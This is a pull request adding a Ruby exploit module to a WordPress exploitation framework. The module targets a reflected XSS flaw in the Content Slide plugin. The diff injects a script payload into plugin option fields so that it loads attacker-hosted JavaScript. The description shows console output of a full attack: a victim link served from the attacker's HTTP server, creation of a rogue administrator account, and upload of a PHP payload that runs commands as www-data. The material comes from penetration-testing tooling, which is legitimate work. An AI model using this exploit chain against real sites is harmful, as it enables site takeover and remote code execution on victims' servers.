### PR TITLE
Add "Content-Slide" reflected XSS module

### DIFF
--- a/modules/exploits/content_slide_reflected_xss_shell_upload.rb
+++ b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
@@ -1,0 +1,36 @@
+class Wpxf::Exploit::ContentSlideReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Content Slide Reflected XSS Shell Upload',
+      author: [
+        'Tom Adams (dxw)',                  # Disclosure
+        'Paul Williams <phyushin@phyubox.com' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7908'],
+        ['URL', 'https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/']
+      ],
+      date: 'Apr 16 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('content-slide')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=content-slide/content_slide.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'wpcs_options[no_of_custom_images]' => 1,
+      'wpcs_options[slide_image1]'        => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end


### PR DESCRIPTION
This module exploits the "content-slide" WordPress plugin.

**Fixed in** : Not Fixed

**References**:

https://packetstormsecurity.com/files/131500/
https://wpvulndb.com/vulnerabilities/7908

**WPVDBID** : [7908](https://wpvulndb.com/vulnerabilities/7908)

**Disclosure** :2015-04-16

_**Example output**_:
```
wpxf > use exploit/content_slide_reflected_xss_shell_upload 

  [+] Loaded module: #<Wpxf::Exploit::ContentSlideReflectedXssShellUpload:0x0000000332f8e0>

wpxf [exploit/content_slide_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/content_slide_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/content_slide_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/content_slide_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x000000032c48b0>

wpxf [exploit/content_slide_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/content_slide_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/content_slide_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.20:8080/YMWvhjYB/llWDEXc

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Initial request received...
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, YpQpFQ:ptelxDHozk
  [-] HTTP server stopped
  [-] Authenticating with WordPress using YpQpFQ:ptelxDHozk...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/stVPGhbvhk/BSCAKxKxam.php...
  [+] Result: www-data
  [+] Execution finished successfully
 
  ```